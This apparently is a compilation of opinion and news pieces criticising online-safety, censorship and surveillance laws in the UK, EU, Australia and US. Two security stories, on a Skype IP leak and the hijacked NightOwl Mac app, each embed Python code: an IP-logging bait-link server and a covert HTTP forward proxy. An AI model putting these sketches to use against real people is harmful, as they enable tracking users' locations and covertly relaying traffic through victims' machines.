The UK Government Knows How Extreme The Online Safety Bill Is

The U.K.’s Online Safety Bill (OSB) has passed a critical final stage in the House of Lords, and envisions a potentially vast scheme to surveil internet users.

The bill would empower the U.K. government, in certain situations, to demand that online platforms use government-approved software to search through all users’ photos, files, and messages, scanning for illegal content. Online services that don’t comply would face harsh penalties, up to and including criminal liability.

Such a backdoor scanning system can and will be exploited by bad actors. It will also produce false positives, leading to false accusations of child abuse that will have to be resolved. That’s why the OSB is incompatible with end-to-end encryption—and human rights. EFF has strongly opposed this bill from the start.

Now, with the bill on the verge of becoming U.K. law, the U.K. government has sheepishly acknowledged that it may not be able to make use of some aspects of this law. During a final debate over the bill, a representative of the government said that orders to scan user files “can be issued only where technically feasible,” as determined by Ofcom, the U.K.’s telecom regulatory agency. He also said any such order must be compatible with U.K. and European human rights law.

That’s a notable step back, since previously the same representative, Lord Parkinson of Whitley Bay, said in a letter to the House of Lords that the technology that would magically make invasive scanning co-exist with end-to-end encryption already existed. “We have seen companies develop such solutions for platforms with end-to-end encryption before,” wrote Lord Parkinson in that letter.

U.K. Government Finally Admits It Can’t Scan for Child Porn Without Violating Everybody’s Privacy

The U.K. government finally acknowledges that a component of the Online Safety Bill that would force tech companies to scan data and messages for child porn images can’t be implemented without violating the privacy rights of all internet users and undermining the data encryption tools that keep our information safe.

And so the government is backing down—for now—on what’s been called the “spy clause.” Using the justification of fighting the spread of child sexual abuse material (CSAM), part of the Online Safety Bill would have required online platforms to create “backdoors” that the British government could use to scan messages between social media users. The law also would’ve allowed the government to punish platforms or sites that implement end-to-end encryption and prevent the government from accessing messages and data.

While British officials have insisted that this intrusive surveillance power would be used only to track down CSAM, tech and privacy experts have warned repeatedly that there’s no way to implement a surveillance system that could be used only for this particular purpose. Encryption backdoors allow criminals and oppressive governments to snoop on people for dangerous and predatory purposes. Firms like Signal and WhatsApp threatened to pull their services from the U.K. entirely if this bill component moved forward.

Direct Government Censorship Of The Internet Is Here

Censorship of the Internet has been getting worse for years, but we just crossed a threshold which is going to take things to a whole new level. 

On August 25th, a new law known as the “Digital Services Act” went into effect in the European Union.  Under this new law, European bureaucrats will be able to order big tech companies to censor any content that is considered to be “illegal”, “disinformation” or “hate speech”.  That includes content that is posted by users outside of the European Union, because someone who lives in the European Union might see it.  I wrote about this a few days ago, but I don’t think that people are really understanding the implications of this new law.  In the past, there have been times when governments have requested that big tech companies take down certain material, but now this new law will give government officials the power to force big tech companies to take down any content that they do not like.

Any big tech companies that choose not to comply will be hit with extremely harsh penalties.

Of course mainstream news outlets such as the Washington Post are attempting to put a positive spin on this new law.  We are being told that it will “safeguard” us from “illegal content” and “disinformation”…

New rules meant to safeguard people from illegal content, targeted ads, unwanted algorithmic feeds and disinformation online are finally in force, thanks to new regulation in the European Union that took effect this month.

Doesn’t that sound wonderful?

Talking About Sex Online Shouldn’t Be Illegal

Kayden Kross, an adult film entrepreneur and a former business partner of mine, sent me a text message a few months ago. She was excited—she was seeing a community of straight dudes gather on Deeper, the power exchange and BDSM-themed website she owns, to discuss their sexual preferences, turn-ons, and other various tastes. And she was seeing this across other platforms too. This felt rare to her, and groundbreaking to me. 

When I asked Lucie Fielding, a mental health counselor in Washington state, how many spaces she was aware of for straight men to have these conversations, she said, “Oh, not many—unless we’re talking incels—there’s got to be stuff on Reddit, but apart from that, these are such important forums. Because there’s such a societal pressure for men not to be talking with one another about these things.” But on platforms like Deeper, PornHub, and other online providers of adult videos, the comments section is just that sort of conversation.

Kross described the communities as having creeds of acceptance, giving examples such as “The ‘don’t yuck my yum’ thing. It’s agreed upon that so long as you are not saying something that is a political minefield, it is not OK to dog on someone else’s expression of what they’re there for. And when people do, even if it’s something where you can’t imagine anyone would be into that, you’ll see people rush to that person’s defense. There’s very much this understanding that in order for this to work, everyone has to agree not to add shame to the pile.”

And it isn’t just sexuality being shared. Someone might say, according to Kross, “‘My dog died today.’ And then someone else will chime in with, ‘Oh, I’m so sorry.’ And then the person will say, ‘I had no one,’ and ‘I’m alone.’ And then someone else would be like, ‘Well, I would have given you a hug if I was there.’ We all know, there’s this kind of idea of traditional masculinity, and the expectations are that men don’t really talk about their feelings. And the fact is, in the comment section, when you’re anonymous, you’re not subject any longer to expectations, right? That’s why we have trolls. But it’s also why you end up with these kinds of conversations that, you know—otherwise, who would you have them with?”

But these conversations, like so many others, are at risk of being censored out of existence. New state laws requiring verification of consumers’ ages threaten to wipe out small producers and scare off subscribers concerned about threats to their own reputations in the event of a data breach. Laws like SESTA/FOSTA have made promotion of adult entertainment—already an uphill battle—even more starkly difficult, reaching as far as those Reddit communities Fielding mentioned and causing many subreddits about sexuality to shutter. And payment processors and banks have been denying adult workers access to financial infrastructure for decades.

Why does freedom of speech and freedom from shame matter in this context? According to Fielding, “Shame tells us that we are bad. That our desires are bad, that our pleasure isn’t valid. And the relationship between shame and isolation is that when we feel that we are bad or that there’s something to be ashamed of, we withdraw because we don’t want to share that.… That leads to social withdrawal.… It means that folks are trying things in very risky ways, because they don’t have the community around them.” One example is choking—without proper safety and risk-informed consent, this risky activity can turn deadly with alarming ease.

Hackers Can Silently Grab Your IP Through Skype — Microsoft Is In No Rush to Fix It

Hackers are able to grab a target’s IP address, potentially revealing their general physical location, by simply sending a link over the Skype mobile app. The target does not need to click the link or otherwise interact with the hacker beyond opening the message, according to a security researcher who demonstrated the issue and successfully discovered my IP address by using it.

Yossi, the independent security researcher who uncovered the vulnerability, reported the issue to Microsoft earlier this month, according to Yossi and a cache of emails and bug reports he shared with 404 Media. In those emails Microsoft said the issue does not require immediate servicing, and gave no indication that it plans to fix the security hole. Only after 404 Media contacted Microsoft for comment did the company say it would patch the issue in an upcoming update.

The attack could pose a serious risk to activists, political dissidents, journalists, those targeted by cybercriminals, and many more people. At minimum, an IP address can show what area of a city someone is in. An IP address can be even more revealing in a less densely populated area, because there are fewer people who could be associated with it.

“I think just about anybody could be harmed by this,” Cooper Quintin, a security researcher and senior public interest technologist at activist organization the Electronic Frontier Foundation (EFF), said when I explained the issue to him. Quintin said the major concern was “finding people’s location for physical escalations, and finding people’s IP address for digital escalations.”

To verify that the vulnerability has the impact that Yossi described, I asked him to test it out on me. To start, Yossi sent me a link via Skype text chat to google.com. The link was to the real Google site, and not an imposter.

I then opened Skype on an iPad and viewed the chat message. I didn’t even click the link. But very soon after, Yossi pasted my IP address into the chat. It was correct.
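
404 Media doesn’t describe the technical details of the flaw, but the general class of attack is easy to demonstrate: if a chat client fetches a link preview from the user’s own device, the server behind the link learns that device’s IP address. Below is a minimal sketch in Python of the attacker’s side (hypothetical names, for illustration only; this shows the attack class, not Skype’s actual mechanism):

```python
import http.server
import threading

hits = []  # records (client_ip, path) for every request the server sees

class LinkLogger(http.server.BaseHTTPRequestHandler):
    """Serve an innocuous page while logging who fetched it.

    Any fetch of the link -- a user's click, or a chat client
    generating a preview on the recipient's device -- reveals the
    fetcher's IP address to the server operator.
    """

    def do_GET(self):
        hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<html><title>totally harmless</title></html>")

    def log_message(self, *args):
        pass  # keep the demo quiet

# Bind to port 0 so the OS picks a free port for the demo.
server = http.server.HTTPServer(("127.0.0.1", 0), LinkLogger)
threading.Thread(target=server.serve_forever, daemon=True).start()
bait_url = f"http://127.0.0.1:{server.server_address[1]}/bait"
```

In a real attack the server would sit on a public host and the bait URL would be sent over chat, which is why a client-side fix is to proxy preview fetches through the vendor’s servers or disable them entirely.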

How a Well-Regarded Mac App Became a Trojan Horse

In the early days of macOS Mojave in 2018, Apple hadn’t yet offered users a way to automatically switch between dark and light mode at different times of the day. As usual, there were third-party developers eager to pick up the slack. One of the better-regarded apps filling this gap was NightOwl, first released in mid-2018: a small, simple utility that could run in the background during day-to-day use.

Once later macOS releases added official support for scheduled dark mode switching, the NightOwl app was left forlorn and forgotten on many older Macs. Few of its supposed tens of thousands of users likely noticed when the app running in the background of their older Macs was bought by another company, nor when, earlier this year, that company silently updated the app so that it hijacked their machines in order to route traffic through a network of affected computers, AKA a botnet.

After some users noted issues with the app following a June update, web developer Taylor Robinson discovered the problem ran deep: the program was redirecting users’ connections without any notification. The real dark mode turned out to be the transformation of a respectable Mac app into a playground for data harvesters.

In an email to Gizmodo, Robinson broke down their investigation into the app. They found that NightOwl installs a launch agent that turns the user’s computer into a kind of botnet node, relaying data that’s sold to third parties. The updated 0.4.5.4 version of NightOwl, released June 13, runs a local HTTP proxy without users’ direct knowledge or consent, they said. The only hint NightOwl gives users that something is afoot is a consent notice after they hit the download button, saying the app uses Google Analytics for anonymized tracking and bug reporting. The botnet settings cannot be disabled through the app, and to remove the modifications made to a Mac, users need to run several commands in the Terminal app to excise the vestiges of the code from their system, per Robinson.
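
The mechanism Robinson describes, a quiet local HTTP proxy that relays other people’s traffic through the victim’s machine, follows a well-known pattern. A minimal sketch of such a forward proxy in Python (hypothetical and for illustration only; NightOwl’s actual code has not been published):

```python
import http.server
import threading
import urllib.request

class ForwardProxy(http.server.BaseHTTPRequestHandler):
    """Minimal HTTP forward proxy.

    A proxy client puts the absolute target URL in the request line;
    we fetch that URL and relay the response. Any machine running this
    becomes an exit point for whoever can reach the port -- the core of
    what a residential-proxy botnet sells to third parties.
    """

    def do_GET(self):
        # When acting as a proxy, self.path holds the full target URL.
        with urllib.request.urlopen(self.path) as upstream:
            body = upstream.read()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # a covert proxy leaves no logs

# Bind to port 0 so the OS picks a free port for the demo.
proxy = http.server.HTTPServer(("127.0.0.1", 0), ForwardProxy)
threading.Thread(target=proxy.serve_forever, daemon=True).start()
proxy_port = proxy.server_address[1]
```

Traffic leaving such a proxy carries the victim’s IP address, which is precisely what makes hijacked consumer machines valuable to data harvesters.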

It’s currently unclear how many users were affected by the seemingly malicious code, especially as NightOwl has since been pulled from both its website and the app store. The NightOwl site claims the app was downloaded more than 141,000 times and had more than 27,000 active users. Even if the app lost most of its users once Apple shipped its own dark mode scheduling, potentially thousands were still running NightOwl on their old Macs.

Australia’s Misinfo Bill Paves Way for Soviet-Style Censorship

The Australian Government’s proposed new laws to crack down on misinformation and disinformation have drawn intense criticism for their potential to restrict free expression and political dissent, paving the way for a digital censorship regime reminiscent of Soviet Lysenkoism.

Under the draft legislation, the Australian Communications and Media Authority (ACMA) will gain considerably expanded regulatory powers to “combat misinformation and disinformation,” which ACMA says poses a “threat to the safety and wellbeing of Australians, as well as to our democracy, society and economy.”

Digital platforms will be required to share information with ACMA on demand, and to implement stronger systems and processes for handling misinformation and disinformation.

ACMA will be empowered to devise and enforce digital codes with a “graduated set of tools” including infringement notices, remedial directions, injunctions and civil penalties, with fines of up to $550,000 (individuals) and $2.75 million (corporations). Criminal penalties, including imprisonment, may apply in extreme cases.

Controversially, the government will be exempt from the proposed laws, as will professional news outlets, meaning that ACMA will not compel platforms to police misinformation and disinformation disseminated by official government or news sources.

As the government and professional news outlets have been, and continue to be, a primary source of online misinformation and disinformation, it is unclear that the proposed laws will meaningfully reduce online misinformation and disinformation. Rather, the legislation will enable the proliferation of official narratives, whether true, false or misleading, while quashing the opportunity for dissenting narratives to compete.

A Ham-Handed Bill Attacks the First Amendment in the Name of Protecting Minors From Online Harm

Late last month, a Senate committee considered a 50-page bill with a name that includes the word kids and approved it unanimously. Those two facts alone are enough to raise the suspicion that legislators are heading down a winding road toward a destination they only dimly perceive.

That suspicion is amply supported by the text of the Kids Online Safety Act (KOSA), which ham-handedly aims to shield children and teenagers from vaguely defined dangers lurking on the internet. The unintended but foreseeable results are apt to include invasions of privacy that compromise First Amendment rights and a chilling impact on constitutionally protected speech, both of which will harm adults as well as the “kids” whom the bill is supposed to protect.

KOSA imposes an amorphous “duty of care” on platforms, online games, messaging applications, and streaming services, demanding “reasonable measures” to “protect” against and “mitigate” various “harms” to users younger than 17. The targeted dangers include anxiety, depression, suicide, eating disorders, substance abuse, “addiction-like behaviors,” physical violence, online bullying, harassment, sexual exploitation and abuse, “financial harms,” and promotion of “narcotic drugs,” tobacco products, alcohol, or gambling.

That’s a tall order, and it is not at all clear what meeting this obligation would entail. Nor is it clear when the duty of care applies.

As amended by the Senate Commerce Committee, KOSA applies to any “covered platform” that “knows” its users include minors. But no one knows what “knows” means.

In addition to “actual knowledge,” that condition can be satisfied by “knowledge fairly implied on the basis of objective circumstances.” KOSA directs the Federal Trade Commission (FTC), within 18 months of the bill’s passage, to issue “guidance” about how to understand the latter phrase.

That guidance, however, would not bind the FTC, which is charged with investigating and penalizing platforms that it thinks have violated KOSA. Nor would it constrain state attorneys general, who would be authorized to independently enforce KOSA through “civil actions.”

An earlier version of KOSA provoked criticism from civil libertarians who warned that it would effectively require platforms to verify users’ ages, which would entail collecting personal information. That was a clear threat to internet users of all ages who want to engage in speech without revealing their identities, a well-established First Amendment right.

In response to that concern, the latest version of KOSA revises the duty-of-care test and explicitly says it does not require “age gating or age verification.” But given the burdens the bill imposes and the uncertainty about what counts as “knowledge fairly implied,” platforms still would have a strong incentive to exclude minors or minimize the number of users who are younger than 17.

Democrat State Attorneys General File Brief In Support of Biden Censorship Power

In a move that underscores the unceasing tension between free speech and the control of information online, 20 Democratic state attorneys general have filed a brief in federal court seeking to restore their ability to urge social media companies to censor user content.

Headlined by New York Attorney General Letitia James, the group is adamant that recent federal court decisions are hindering its ability to prevent the circulation of misleading information.

On July 4, US District Judge Terry Doughty issued an order greatly restraining government officials’ influence over social media moderation, finding that the evidence already presented showed possible First Amendment violations.

Stemming from a lawsuit filed in May 2022 by the Republican attorneys general of Louisiana and Missouri, the ruling found that the Biden administration had unjustly pressured social media platforms into suppressing posts perceived as potential triggers for vaccine hesitancy during the COVID-19 crisis or as destabilizers of electoral processes.

This push for moderation by government officials, the suit asserted, unjustly infringed upon the First Amendment right to free speech. The claims were aimed in particular at tech conglomerates like Meta’s Facebook and Google’s YouTube, which allegedly began limiting the spread of information deemed misleading around 2019.

The order is currently suspended pending an appeal by the Biden administration. Should the 5th Circuit reinstate it, it would bar government departments, including the Department of Health and Human Services and the Federal Bureau of Investigation, from communicating with social media companies about removing or suppressing content protected as free speech under the First Amendment.

Senators Introduce Bipartisan Bill to Regulate Online Speech

Senators Elizabeth Warren (D-MA) and Lindsey Graham (R-SC) have introduced a bill to create a new federal government commission overseeing online communication. The legislation is presented as consumer protection, but it grants the government new authority to police speech on the internet.

“For too long, giant tech companies have exploited consumers’ data, invaded Americans’ privacy, threatened our national security, and stomped out competition in our economy,” said Warren. “This bipartisan bill would create a new tech regulator and makes clear that reining in Big Tech platforms is a top priority on both sides of the aisle.”

“For years, I have been trying to find ways to empower consumers against Big Tech,” Graham claimed. “I have heard too many stories from families who feel helpless in the face of Big Tech. … The creation of a regulatory commission to oversee Big Tech is the first step in a long journey to protect American consumers from the massive power these companies currently wield.”

The bill will establish a Digital Consumer Protection Commission empowered to designate some websites as “dominant platforms.” Those sites appear to be squarely in the new commission’s crosshairs: the legislation even anticipates attempts “to intentionally avoid having the platform meet the qualifications for designation as a dominant platform.”

The “dominant platforms” will be required to inform the government of their content moderation policies. The bill will require designated companies to “make publicly available, through clear and conspicuous disclosure, the dominant platform’s terms of service, which shall include the criteria the operator employs in content moderation practices.”
